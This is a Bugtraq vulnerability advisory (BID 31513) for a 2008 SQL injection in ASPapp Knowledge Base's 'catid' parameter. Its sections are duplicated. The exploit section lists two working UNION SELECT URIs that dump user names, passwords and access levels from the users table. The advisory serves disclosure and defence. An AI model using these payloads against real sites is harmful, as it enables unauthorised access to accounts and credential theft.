ASPapp Knowledge Base 'catid' Parameter SQL Injection Vulnerability
BID:31513
Info
ASPapp Knowledge Base 'catid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 31513 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 01 2008 12:00AM |
| Updated: | Oct 01 2008 11:58PM |
| Credit: | Crackers_Child |
| Vulnerable: |
ASPapp Knowledge Base 0 |
| Not Vulnerable: | |
Discussion
ASPapp Knowledge Base 'catid' Parameter SQL Injection Vulnerability
ASPapp Knowledge Base is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ASPapp Knowledge Base is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
ASPapp Knowledge Base 'catid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/content_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users
http://www.example.com/content_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/content_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users
http://www.example.com/content_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users
Solution / Fix
ASPapp Knowledge Base 'catid' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ASPapp Knowledge Base 'catid' Parameter SQL Injection Vulnerability
References:
References:
- Knowledge Base Homepage (ASPapp)